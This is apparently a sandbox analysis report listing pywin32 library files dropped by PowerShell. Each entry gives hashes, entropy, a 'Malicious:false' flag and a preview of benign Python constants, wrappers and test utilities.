                                                                                                                                                                                                            Preview:o..........g;........................@...sB...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d Z"d!Z#d"Z$d#Z%d$Z&d%Z'd&Z(d'Z)d(Z*d)Z+d*Z,d+Z-d,Z.d-Z/d.Z0d/Z1d0Z2d1Z3d.Z4d2Z5d3Z6d4Z7d5Z8d6Z9d7Z:d8Z;d9Z<d:Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd.ZGd ZHd.ZId4ZJd.ZKd.ZLd!ZMd#ZNd$ZOd&ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd.ZZd.Z[d.Z\d.Z]d.Z^d Z_d.Z`d4Zad.Zbd.Zcd!Zdd.Zed.Zfd.Zgd.Zhd.Zid.Zjd.Zkd.Zld.Zmd.Znd.Zod.Zpd.Zqd.Zrd.Zsd.Ztd.Zud.Zvd.Zwd.Zxd.Zyd.Zzd.Z{d.Z|d.Z}d.Z~d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z.d.Z.d4Z.d.Z.d.Z.d!Z.d#Z.d$Z.d&Z.d'Z.d(Z.d.Z.d-Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d;d<..Z.d=d>..Z.d?Z.d@dA..Z.dBdC..Z.dDZ.e.Z.d.Z.d$Z.d.Z.d.Z.d Z.d&Z.dEZ.dDZ.d.Z.dFZ.dGZ.dHZ.dIZ.dJZ.dKZ.dEZ.d.Z.d.Z.d Z.d&Z.dEZ.dDZ.d.Z.dFZ.dGZ.dHZ.dIZ.dJZ.d.Z.d.Z.d.Z.d Z.dDZ.d$Z.d.Z.dLZ.dMZ.d.Z.d.Z.d.Z.d Z.d&Z.dEZ.dNZ.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.dOZ.dPZ.dQZ.dRZ.dSZ.dTZ.dUZ.dVZ.dWZ.dXZ.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z.d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3309
                                                                                                                                                                                                            Entropy (8bit):5.472825403124173
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CPtU9idtjErttH4lS0x7LeYCjkoEenU3t1+b19ZrIptmPpPV/pJR2Ub0k0k0k0k8:CPtxerttISs7CJEe11GtyZtR0zzzsPw
                                                                                                                                                                                                            MD5:18F7CE1CC7B3ABB378D11A67D56E1A09
                                                                                                                                                                                                            SHA1:16D0FDFE1DF8D6D9ADA056F0F4D250044EDD557E
                                                                                                                                                                                                            SHA-256:223BCC3CC882F15C05DD41D083BC29B6D494F88CBCA168AEE4B7D848FE73FA1A
                                                                                                                                                                                                            SHA-512:551193B249C64CB7CA42B27014CC56BEBD6301B6D4C7660DF244B0BB917E07A7972068EE06ED213FB2A86E891E78492ED759314A6A5D1A3FDD21486493F55768
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"e.e.B.e.B.e.B.e.B.e.B.Z#e.e.B.e.B.e.B.e.B.e B.Z$e.e.B.e.B.e.B.e.B.e.B.Z%e.e.B.e.B.e.B.e.B.e.B.Z&e.e.B.e.B.e.B.e.B.e.B.Z'e.e.B.e.B.e.B.Z(e.e.B.e.B.e.B.Z)e.e.B.e.B.e.B.Z*e.e.B.e.B.e.B.Z+e.e.B.e.B.e.B.Z,e.e.B.e.B.e.B.e.B.e B.Z-e.e.B.e.B.e.B.e.B.e.B.Z.e.e"B.Z/e.e.B.e.B.e.B.e.B.e.B.e B.Z0e.e.B.e.B.e"B.d.B.Z1e.e.B.e.B.e!B.Z2e.e.B.e.B.e"B.d.B.Z3e.e.B.e.B.e"B.Z4e.e.B.e.B.e.B.e.B.e B.Z5e.e.B.e.B.e.B.e.B.e.B.e B.Z6e.e.B.e.B.e.B.e.B.e.B.e B.Z7e.e.B.e.B.e.B.e.B.e.B.e.B.e B.Z8e.e.B.e.B.e.B.e"B.Z9e.e.B.e.B.e.B.e.B.e.B.e B.Z:e.e.B.e.B.e.B.e.B.e.B.e.B.e B.Z;e.e.B.e.B.e B.Z<e.e.B.e.B.e"B.d.B.Z=e.e.B.e.B.e.B.e!B.Z>d.Z?e.e.B.e.B.e.B.e.B.Z@e.e.B.e.B.e.B.e.B.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd S.)!....................i....i....i....i....i....i....i....i....i....i....i....i....i.. .i..@.i....i....i....i....i... i...0i...@..........i....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):466
                                                                                                                                                                                                            Entropy (8bit):5.294079416975829
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1Fl9OB+aKV3v7zN1R0khykuZnhW/MP8u5WrTR/2IaGE6q:C5vaKVv7hRhyNZhNP/srN2cBq
                                                                                                                                                                                                            MD5:482495CB08FEA469065CBD4668F8DCBD
                                                                                                                                                                                                            SHA1:9059AAD98203F44CE9463C8B9FB0E1BA684D73F1
                                                                                                                                                                                                            SHA-256:503A1ED7ECCCECD9AD7DC19D321F5598F1E3C01209C370FC8D33385E6319DCD4
                                                                                                                                                                                                            SHA-512:4F42F5B765DA3ACAAB6BEE441C5171AD1258FB43B785B016B55809174B31615BEAC06F2FCE5585718872AF3A052BD23B239526594F1836C76CC84BAB016694ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.T.d.S.).z.A useful wrapper around the "_winxptheme" module...Originally used when we couldn't be sure Windows XP apis were going to.be available. In 2022, it's safe to assume they are, so this is just a wrapper.around _winxptheme.......)...*N)...__doc__Z._winxptheme..r....r.....kC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/winxptheme.py..<module>....s........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4668
                                                                                                                                                                                                            Entropy (8bit):5.045494394297153
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:VWEUCsGsgJOjZSGhzgL/Msly8vQP2DssYm1CuJJm6scwJRs8svPblEjbF92ClD4L:IesGsg4+Us084YssYm1CuOrcwJR/uzl/
                                                                                                                                                                                                            MD5:A74E771C5CA1CDDBB920F6B7DDF64240
                                                                                                                                                                                                            SHA1:A48AD562BAB2B99820EE86FD443BFB22F9F5C415
                                                                                                                                                                                                            SHA-256:5EA72AEEFC0AA68B6F7AACB715013FE6E3C16DFB30D67D3CD77B0E5A9A897D40
                                                                                                                                                                                                            SHA-512:D0B2B5BE43C01E2381D6F5F69501717B6295023BB485EA69AB63320238CDFA0C6012EBF559768968F2EDABBCDD57DD628B8EE79E7E3641C74E0CFF9184D94C54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..A pure-python re-implementation of methods used by win32verstamp...This is to avoid a bootstraping problem where win32verstamp is used during build,..but requires an installation of pywin32 to be present...We used to work around this by ignoring failure to verstamp, but that's easy to miss.....Implementations adapted, simplified and typed from:..- https://github.com/enthought/pywin32-ctypes/blob/main/win32ctypes/core/ctypes/_util.py..- https://github.com/enthought/pywin32-ctypes/blob/main/win32ctypes/core/cffi/_resource.py..- https://github.com/enthought/pywin32-ctypes/blob/main/win32ctypes/pywin32/win32api.py....---....(C) Copyright 2014 Enthought, Inc., Austin, TX..All right reserved.....This file is open source software distributed according to the terms in..https://github.com/enthought/pywin32-ctypes/blob/main/LICENSE.txt.."""....from __future__ import annotations....from collections.abc import Iterable..from ctypes import FormatError, WinDLL, get_last_error..from ctypes.winty
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):206
                                                                                                                                                                                                            Entropy (8bit):4.6503549143738585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:JSLXLoowvLJVwLBmZ8irVmLGXXwCrNAD7lwX42LP2M/Vm719GvSlAl8G+LM2Q:wXLor1VwK8GmyQLHI42LP2QWg1T/
                                                                                                                                                                                                            MD5:CC2F2BAA27E0D6CDAF3A9C0217C8C2DF
                                                                                                                                                                                                            SHA1:2F72CF4B0FE7B5F4156494FFFF7D176B83E068FF
                                                                                                                                                                                                            SHA-256:82D7B3BA4A73C0610B32BB8CB5AF2E4A8E2BF29ECD3ABD16AE8B5C963E229554
                                                                                                                                                                                                            SHA-512:3EBB57F70A6FBE0960FB691CAF3F38E60198513B8305C6D3EB02D475237C35F80CEFF8CBC838AE479D0B14F4B63ECAC7A438CA0AFAB99D1F6195AD1F2F3E8EAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import warnings....from pywin.mfc.afxres import *....warnings.warn(.. "Importing the global `afxres` module is deprecated. Import from `pywin.mfc.afxres` instead.",.. category=DeprecationWarning,..)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):47709
                                                                                                                                                                                                            Entropy (8bit):5.156437493527626
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:W1AdIBk/PBWdXFZUPdCQExO3mtknVg/01M5DiOFfzDldLs4fubifjAIiQcjp5/EH:4AdAZUP0PBYiztt
                                                                                                                                                                                                            MD5:5AEE71E900E2F27548FD4CA336FCE67A
                                                                                                                                                                                                            SHA1:0C353004FEBD0BBF780B5EEE070104B8F97FFBE7
                                                                                                                                                                                                            SHA-256:48F50757CAE7337D11654E56EA625B014E143F593EAD2039D08F665E080A08C6
                                                                                                                                                                                                            SHA-512:AEC750B825B99D976A68D33250651849AA49AE11351980E9111FDB3A2E7E602DE3702565DB26DB64147266B8CA9D7BB893F2B9D02811539C48C27D7403E9B59A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Generated by h2py from COMMCTRL.H..WM_USER = 1024..ICC_LISTVIEW_CLASSES = 1 # listview, header..ICC_TREEVIEW_CLASSES = 2 # treeview, tooltips..ICC_BAR_CLASSES = 4 # toolbar, statusbar, trackbar, tooltips..ICC_TAB_CLASSES = 8 # tab, tooltips..ICC_UPDOWN_CLASS = 16 # updown..ICC_PROGRESS_CLASS = 32 # progress..ICC_HOTKEY_CLASS = 64 # hotkey..ICC_ANIMATE_CLASS = 128 # animate..ICC_WIN95_CLASSES = 255..ICC_DATE_CLASSES = 256 # month picker, date picker, time picker, updown..ICC_USEREX_CLASSES = 512 # comboex..ICC_COOL_CLASSES = 1024 # rebar (coolbar) control..ICC_INTERNET_CLASSES = 2048..ICC_PAGESCROLLER_CLASS = 4096 # page scroller..ICC_NATIVEFNTCTL_CLASS = 8192 # native font control..ODT_HEADER = 100..ODT_TAB = 101..ODT_LISTVIEW = 102..PY_0U = 0..NM_FIRST = PY_0U # generic to all controls..NM_LAST = PY_0U - 99..LVN_FIRST = PY_0U - 100 # listview..LVN_LAST = PY_0U - 199..HDN_FIRST = PY_0U - 300 # header..HDN_LAST = PY_0U - 399..TVN_FIRST = PY_0U - 400 # treeview..TVN_LA
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31230
                                                                                                                                                                                                            Entropy (8bit):4.8211736266846135
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:U8wisr5XZIVFF7DPhwNvwQJXqCsrFlEDDlCtdGXOVlhuEz31W6RZ5qkR7KXUB/ez:d0XZQFtFOqGXOVlhBb8C/eBV4mTR
                                                                                                                                                                                                            MD5:E47F78911ABA44A3EC83EFB0802C9242
                                                                                                                                                                                                            SHA1:6BF8BE89442BC2C5FF85B3B6B11BAD8EF5109AE5
                                                                                                                                                                                                            SHA-256:48556FF02D8208DC44AF3ECD845128A22D2A47D690F21A21A6E882E321203C84
                                                                                                                                                                                                            SHA-512:0CF6BD4C73121561CEDCC012E07C42C45BFE6A56E5602AC4A10AB5396F39D974A803412789B79786E1142ADA00FC9FBF794995046425E757874886E7B9F80957
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api....# Generated by h2py from d:/msdev/include/mmsystem.h..MAXPNAMELEN = 32..MAXERRORLENGTH = 256..MAX_JOYSTICKOEMVXDNAME = 260..MM_MICROSOFT = 1..MM_MIDI_MAPPER = 1..MM_WAVE_MAPPER = 2..MM_SNDBLST_MIDIOUT = 3..MM_SNDBLST_MIDIIN = 4..MM_SNDBLST_SYNTH = 5..MM_SNDBLST_WAVEOUT = 6..MM_SNDBLST_WAVEIN = 7..MM_ADLIB = 9..MM_MPU401_MIDIOUT = 10..MM_MPU401_MIDIIN = 11..MM_PC_JOYSTICK = 12..TIME_MS = 0x0001..TIME_SAMPLES = 0x0002..TIME_BYTES = 0x0004..TIME_SMPTE = 0x0008..TIME_MIDI = 0x0010..TIME_TICKS = 0x0020..MM_JOY1MOVE = 0x3A0..MM_JOY2MOVE = 0x3A1..MM_JOY1ZMOVE = 0x3A2..MM_JOY2ZMOVE = 0x3A3..MM_JOY1BUTTONDOWN = 0x3B5..MM_JOY2BUTTONDOWN = 0x3B6..MM_JOY1BUTTONUP = 0x3B7..MM_JOY2BUTTONUP = 0x3B8..MM_MCINOTIFY = 0x3B9..MM_WOM_OPEN = 0x3BB..MM_WOM_CLOSE = 0x3BC..MM_WOM_DONE = 0x3BD..MM_WIM_OPEN = 0x3BE..MM_WIM_CLOSE = 0x3BF..MM_WIM_DATA = 0x3C0..MM_MIM_OPEN = 0x3C1..MM_MIM_CLOSE = 0x3C2..MM_MIM_DATA = 0x3C3..MM_MIM_LONGDATA = 0x3C4..MM_MIM_ERROR = 0x3C5..MM_MIM_LONGERROR = 0x3C6..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6900
                                                                                                                                                                                                            Entropy (8bit):5.210369157730938
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:LS8m3Gq6lNtBznon2wxxYoWJMH1lHYcjmyOeSh4yWy6yWAcyWr6yWvEyWqyW56yz:LS8ikDon2wxdYbcEvBQmn
                                                                                                                                                                                                            MD5:E486C8F46771EF043775B49032C42C56
                                                                                                                                                                                                            SHA1:20AA8000EB463CF10F0E32B58E24443ED876B1FB
                                                                                                                                                                                                            SHA-256:7C1CF611DCC02E83C0B05370D42D1D9B1A8456291A618B71C945C33D39409664
                                                                                                                                                                                                            SHA-512:C8F02BB4F1C811CC29BCD0A380356289B14567BDE123324B502EBA62F720CFC6D7BF71BFF2726A0D41B01765F0085A35E4442B9964CC124622E0838DB95F083E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import struct....import win32wnet....# Constants generated by h2py from nb30.h..NCBNAMSZ = 16..MAX_LANA = 254..NAME_FLAGS_MASK = 0x87..GROUP_NAME = 0x80..UNIQUE_NAME = 0x00..REGISTERING = 0x00..REGISTERED = 0x04..DEREGISTERED = 0x05..DUPLICATE = 0x06..DUPLICATE_DEREG = 0x07..LISTEN_OUTSTANDING = 0x01..CALL_PENDING = 0x02..SESSION_ESTABLISHED = 0x03..HANGUP_PENDING = 0x04..HANGUP_COMPLETE = 0x05..SESSION_ABORTED = 0x06..ALL_TRANSPORTS = "M\0\0\0"..MS_NBF = "MNBF"..NCBCALL = 0x10..NCBLISTEN = 0x11..NCBHANGUP = 0x12..NCBSEND = 0x14..NCBRECV = 0x15..NCBRECVANY = 0x16..NCBCHAINSEND = 0x17..NCBDGSEND = 0x20..NCBDGRECV = 0x21..NCBDGSENDBC = 0x22..NCBDGRECVBC = 0x23..NCBADDNAME = 0x30..NCBDELNAME = 0x31..NCBRESET = 0x32..NCBASTAT = 0x33..NCBSSTAT = 0x34..NCBCANCEL = 0x35..NCBADDGRNAME = 0x36..NCBENUM = 0x37..NCBUNLINK = 0x70..NCBSENDNA = 0x71..NCBCHAINSENDNA = 0x72..NCBLANSTALERT = 0x73..NCBACTION = 0x77..NCBFINDNAME = 0x78..NCBTRACE = 0x79..ASYNCH = 0x80..NRC_GOODRET = 0x00..NRC_BUFLEN = 0x01
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23075
                                                                                                                                                                                                            Entropy (8bit):5.210362441738439
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:3INRQFnDIjqUKvQYvffI20gvRofFitfff/7Qr:3INRQijqUKvlvY20gveIf/Y
                                                                                                                                                                                                            MD5:41FCF83BDAD8EA4D6E47237A51569756
                                                                                                                                                                                                            SHA1:A886903A3E4C8444C3FE3B392AC8FF78F88470CA
                                                                                                                                                                                                            SHA-256:3A2CC89DB698BB625BF4B006C3E4FCA1269F11B1A6DFDDC96F403DC2426647EB
                                                                                                                                                                                                            SHA-512:6380B77193DF54C5587DCEA8A15775DEBEB9B9D624810CC31285707DA296F068FB3B4816CE739F622472163B230BC9F4686036634FCAD1C85603F3F63F8466B5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Hacked from winnt.h....DELETE = 65536..READ_CONTROL = 131072..WRITE_DAC = 262144..WRITE_OWNER = 524288..SYNCHRONIZE = 1048576..STANDARD_RIGHTS_REQUIRED = 983040..STANDARD_RIGHTS_READ = READ_CONTROL..STANDARD_RIGHTS_WRITE = READ_CONTROL..STANDARD_RIGHTS_EXECUTE = READ_CONTROL..STANDARD_RIGHTS_ALL = 2031616..SPECIFIC_RIGHTS_ALL = 65535..ACCESS_SYSTEM_SECURITY = 16777216..MAXIMUM_ALLOWED = 33554432..GENERIC_READ = -2147483648..GENERIC_WRITE = 1073741824..GENERIC_EXECUTE = 536870912..GENERIC_ALL = 268435456....# file security permissions..FILE_READ_DATA = 1..FILE_LIST_DIRECTORY = 1..FILE_WRITE_DATA = 2..FILE_ADD_FILE = 2..FILE_APPEND_DATA = 4..FILE_ADD_SUBDIRECTORY = 4..FILE_CREATE_PIPE_INSTANCE = 4..FILE_READ_EA = 8..FILE_WRITE_EA = 16..FILE_EXECUTE = 32..FILE_TRAVERSE = 32..FILE_DELETE_CHILD = 64..FILE_READ_ATTRIBUTES = 128..FILE_WRITE_ATTRIBUTES = 256..FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 511..FILE_GENERIC_READ = (.. STANDARD_RIGHTS_READ.. | FILE_READ_DATA.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1312
                                                                                                                                                                                                            Entropy (8bit):4.711789904648765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:++ik0eaxlBfU3YcPe4RFNmxqC7HuL2ktkRhmf3BFrLY/P52Q2CK2aV4b11212FH9:+QaXq3pe43N6qCHG2DmFrLUAjC9PEEfv
                                                                                                                                                                                                            MD5:804DC794E796198AF106C20088AB4138
                                                                                                                                                                                                            SHA1:004A0F93F15A40F8ED3A5DEF6C6634937C48836F
                                                                                                                                                                                                            SHA-256:5B7A20A3B71615E1D08FDD9B91125CA615295457BE54A77713705874772AC289
                                                                                                                                                                                                            SHA-512:00E1033241D3B2843BE8A34F89D1F225DBD9F325F7FCEE07E64DCF11DD8AAB094CF7FB2DEAA7EE5DCF3D3285FF54A7AACAD88B086655B99F9162D1F653DE4A22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Imported by pywin32.pth to bootstrap the pywin32 environment in "portable"..# environments or any other case where the post-install script isn't run...#..# In short, there's a directory installed by pywin32 named 'pywin32_system32'..# with some important DLLs which need to be found by Python when some pywin32..# modules are imported...# If Python has `os.add_dll_directory()`, we need to call it with this path...# Otherwise, we add this path to PATH.......try:.. import pywin32_system32..except ImportError: # Python .3.6: replace ImportError with ModuleNotFoundError.. pass..else:.. import os.... # We're guaranteed only that __path__: Iterable[str].. # https://docs.python.org/3/reference/import.html#__path__.. for path in pywin32_system32.__path__:.. if os.path.isdir(path):.. if hasattr(os, "add_dll_directory"):.. os.add_dll_directory(path).. # This is to ensure the pywin32 path is in the beginning to find the..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10876
                                                                                                                                                                                                            Entropy (8bit):4.529015952993545
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ola2NKGQgaXIhyIbpOX/yRw3nGWToR7uYgeI3ttiUyHj5M:opQgKZGoQinGE8iYgeGzyHj5M
                                                                                                                                                                                                            MD5:28856D35F26944492D29C5E348D75A3D
                                                                                                                                                                                                            SHA1:D912F5B78106ED5C40C428098B231CF801D7BF72
                                                                                                                                                                                                            SHA-256:EFDEA4646AEAC3063A5628CAED54A9F12212B6179757B9DE6B6F263DBFADDDED
                                                                                                                                                                                                            SHA-512:77FF1C19273279E77E736886D662DB26F64C42265AAD4A8038D6D905E951B85DCF18ED0F4E2CF0027552A5A1D42F928715A6D9BB7FDE0387A663F2025E0A7881
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Utilities for the pywin32 tests..import gc..import os..import site..import sys..import unittest....import winerror....##..## unittest related stuff..##......# This is a specialized TestCase adaptor which wraps a real test...class LeakTestCase(unittest.TestCase):.. """An 'adaptor' which takes another test. In debug builds we execute the.. test once to remove one-off side-effects, then capture the total.. reference count, then execute the test a few times. If the total.. refcount at the end is greater than we first captured, we have a leak!.... In release builds the test is executed just once, as normal..... Generally used automatically by the test runner - you can safely.. ignore this... """.... def __init__(self, real_test):.. unittest.TestCase.__init__(self).. self.real_test = real_test.. self.num_test_cases = 1.. self.num_leak_iters = 2 # seems to be enough!.. if hasattr(sys, "gettotalrefcount"):.. self.num
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:magic text file for file(1) cmd, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6039
                                                                                                                                                                                                            Entropy (8bit):4.512558964533269
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:qY1XuYmT3zWAY3oeRHjJd98q8Abrx8a5kr/2ajW6mieGZff:q5YiKTfRHjr98u6kOtW6H3ff
                                                                                                                                                                                                            MD5:A57E4F8F3EFD0A8378C8CDC6488A6A19
                                                                                                                                                                                                            SHA1:B340D050B53E97814AB2D383AF21EE80B08FA26E
                                                                                                                                                                                                            SHA-256:43872D7921DFB40A0AAD3A4BDF99D01E369044C2616293CA32A8412447C3FADC
                                                                                                                                                                                                            SHA-512:A95278548F14B0C0ED35C252A3EFA1AB96B9A8E6B9B2170BF58D9E34AF937D0B3B93901FE3936B25D1F1A69A16661107238A22C5FDBB14D64941FB0ECBB1111B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Magic utility that "redirects" to pywintypesXX.dll..import importlib.machinery..import importlib.util..import os..import sys......def __import_pywin32_system_module__(modname, globs):.. # This has been through a number of iterations. The problem: how to.. # locate pywintypesXX.dll when it may be in a number of places, and how.. # to avoid ever loading it twice. This problem is compounded by the.. # fact that the "right" way to do this requires win32api, but this.. # itself requires pywintypesXX... # And the killer problem is that someone may have done 'import win32api'.. # before this code is called. In that case Windows will have already.. # loaded pywintypesXX as part of loading win32api - but by the time.. # we get here, we may locate a different one. This appears to work, but.. # then starts raising bizarre TypeErrors complaining that something.. # is not a pywintypes type when it clearly is!.... # So in what we hope is the last major itera
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1764
                                                                                                                                                                                                            Entropy (8bit):5.041068824178654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:w5G585U5L0Aq5pq5e5He5M5zdI5ds5g5Y53I5cn5Y5DdI5+Hku5EsdI5gmq587+8:wcKSDqHqUsq5dIA+OJIy2RdIgHkuysde
                                                                                                                                                                                                            MD5:A2C3275B8BF7434C8C29BF33403EED6F
                                                                                                                                                                                                            SHA1:DF379D4BD02D7D82AD0C4847CA749A310071B426
                                                                                                                                                                                                            SHA-256:5F002CD66DA43927768A6F606BB8FB33B4A63EBEDC82689CDE814D5ECDB1C190
                                                                                                                                                                                                            SHA-512:2E30F129B93151181C13F41D09029F1B882AEE4699B32466D8FBF35F6D976320281C4435F195D0E0A1D66A2C9F2EC04C952C9317098DBC52E955EF9B402EB146
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32ras....stateStrings = {.. win32ras.RASCS_OpenPort: "OpenPort",.. win32ras.RASCS_PortOpened: "PortOpened",.. win32ras.RASCS_ConnectDevice: "ConnectDevice",.. win32ras.RASCS_DeviceConnected: "DeviceConnected",.. win32ras.RASCS_AllDevicesConnected: "AllDevicesConnected",.. win32ras.RASCS_Authenticate: "Authenticate",.. win32ras.RASCS_AuthNotify: "AuthNotify",.. win32ras.RASCS_AuthRetry: "AuthRetry",.. win32ras.RASCS_AuthCallback: "AuthCallback",.. win32ras.RASCS_AuthChangePassword: "AuthChangePassword",.. win32ras.RASCS_AuthProject: "AuthProject",.. win32ras.RASCS_AuthLinkSpeed: "AuthLinkSpeed",.. win32ras.RASCS_AuthAck: "AuthAck",.. win32ras.RASCS_ReAuthenticate: "ReAuthenticate",.. win32ras.RASCS_Authenticated: "Authenticated",.. win32ras.RASCS_PrepareForCallback: "PrepareForCallback",.. win32ras.RASCS_WaitForModemReset: "WaitForModemReset",.. win32ras.RASCS_WaitForCallback: "WaitForCallback",.. win32ras.RASCS_Projecte
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4602
                                                                                                                                                                                                            Entropy (8bit):4.451602365997944
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vAFTu/qdlwGmOZzeeiHyjULFdu3ZlUa00uuUf2mysdmD2im:4Fq2hxQTyhUjdmD2im
                                                                                                                                                                                                            MD5:7B75E0F0A11DE576386524060F7EB6A6
                                                                                                                                                                                                            SHA1:5014C1B43DFB269F773AEF8A79C2FFC0A78051E8
                                                                                                                                                                                                            SHA-256:28CEF135173F09FF8878538CC3130B9A0D8321DDF934144527651CE016746D5A
                                                                                                                                                                                                            SHA-512:BB7FEDFAC84A1ABB2351C5DB131CC90B6ACB807F60D6C39EFE09D4A8DBED41529D60977DB685F097B38699CC0475E5022421FA86DEA3044753870BDBAD327A45
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
